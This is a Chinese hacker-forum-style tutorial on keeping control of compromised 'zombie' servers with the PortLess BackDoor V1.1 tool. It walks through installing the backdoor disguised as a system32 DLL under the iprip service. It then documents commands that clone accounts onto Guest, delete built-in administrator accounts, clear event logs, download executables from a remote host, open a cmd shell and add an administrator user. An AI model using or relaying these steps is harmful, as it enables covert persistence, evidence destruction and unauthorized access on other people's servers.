今天是这个月的最后几天,为庆祝我BY 隂兲 knlve在这个月找到了女朋友  ，和最近老是丢服务器肉鸡

所以造就了这个教材`呵呵 《服务器高级后门的使用》

 
 现在拿到服务器后 最难的就是留后门,这是我的亲身体会`拿下的服务器`没过两天就丢了

 真的很心痛呵呵。 昨天没有事 无意研究了一宽很老的后门！PortLess BackDoor V1.1

觉得相当的不错！  呵呵`所以就介绍给大家`！  我们先看下这宽后门的介绍

1.检测克隆帐户
2.清日志
3.克隆帐户
4.删除系统帐户(内建用户Guest,Administrator都能删除)
5.枚举系统帐户
6.http下载
7.安装终端
8.查看系统所有IP
9.注销系统
10.关系统电源
11.重启
12.关闭系统
13.查看系统信息
14.查看或修改终端端口

呵呵  我在学校 没有连网`呵呵~  我是2003系统  大家将就一下`就当是台服务器肉鸡吧` 

安装挺简单的`` 把 portlessinst.exe  svchostdll.dll 复制到c:\windows\system32 下

  2000系统就是 c:\winnt\system32

Portlessinst.exe -install ActiveString Password进行安装

   挺简单的 直接运行就安装完毕 然后启动一下`net start iprip

 由于我本机已经安装好了````。。。。。哎 还是给大家测试一下`

  呵呵 `我本机安装好了`   我给大家介绍下连接吧`进我朋友的机器` 我的IP 192.168.2.221

这是我本机开放的端口```一般服务器 80端口总不可能不开吧`？嘿嘿`

意思是连接 我的 80端口{其他端口都可以
意思是`连接后打开我电脑的 1988端口 大家先看下

我本机是不开放 1988的`OK 1988端口打开了`我们连接 连接成功
1.CheckClone               功能:检测克隆帐户
例子:CheckClone

2.CleanEvent               功能:删除系统日志
例子:CleanEvent

3.Clone                    功能:克隆帐户
用法:Clone 帐户 要克隆的帐户 密码
例子:Clone Admin Guest test
上面例子会将Guest克隆到Admin那个用户中，并且Guest的密码被改为test

4.DelUser                  功能:删除一个用户(这功能可以删除内建用户，所以不要随便用)
用法:DelUser 用户名
例子:Deluser Test    
上面例子会将test这个用户删除

5.Exit                    功能:退出后门
例子:Exit

6.http://ip/文件名 保存文件名    功能:下载程序
例子?http://11.11.11.11/a.exe a.exe
例子?http://www.mysite.com/a.exe a.exe
例子? http://www.mysite.com:81/a.exe a.exe

7.Installterm 端口               功能:在没有安装终端服务的win 2k服务版的系统中安装终端服务，重启系统后才生效.
用法:Installterm 3345             (重启后终端会打开3345那个端口,使用此命令前先看看你要定义的终端的端口是否被
                                   其它程序所用)

8.ListIP                         功能:显示系统所有IP
例子:ListIP

9.Logoff                         功能:注销系统
例子:Logoff

10.PowerOff                      功能:关闭电源
例子:PowerOff

11.Reboot                        功能:重启系统
例子:Reboot

12.ShutDown                      功能:关闭系统
例子:ShutDown

13.Shell                         功能:得到一个Cmd Shell
例子:Shell
得到Shell要退出,输入exit就能退出后门

14.Sysinfo                       功能说明:查看系统的信息(比较详细)
例子:Sysinfo

15.TerminalPort                  功能:查看终端服务端口
例子:TerminalPort         

16.TerminalPort 新的端口         功能:重新设置终端服务端口
例子:TerminalPort 新的端口
注意:新端口必须是合法的端口,否则程序会返回错误。

如何删除这个后门:
1.net stop iprip(可能要等一会将所有东西都释放,如果不是强行停止的话，在svclog.log会有一个Quit的信息)
2.sc delete iprip或portlessinst -uninstall,建议使用portlessinst -unstall命令删除，因为
用这命令删除的话，会将保存在注册表内的ActiveString和password都删除的.

如何更改ActiveString和Password
1.Portlessinst -set 新的ActiveString 新的密码
2.重启后门服务或者重启系统才有生效.

其它说明:
1.后门只能用在win 2k/xp/2003中
2.使用反向连接，接受这个反向连接的系统必须有一个公网IP
3.后门启动时会生成一个svclog.log的文件,这个是记录后门的出错信息和启动信息的,后门启动时
  会将旧的svclog.log删除,如果你使用不了这后门，可以看看svclog.log中的信息，或者可以看到
  是哪里出错了.
4.没有什么时间测试,所以如果有bug的话,不奇怪.
5.ActiveString和Password最大长度都是64个字符 这是用法 其实我们只要一个SEHLL就行
看到没有 192.168.2.221 我们加个用户试试 OK 加入管理员   呵呵`爽吧`？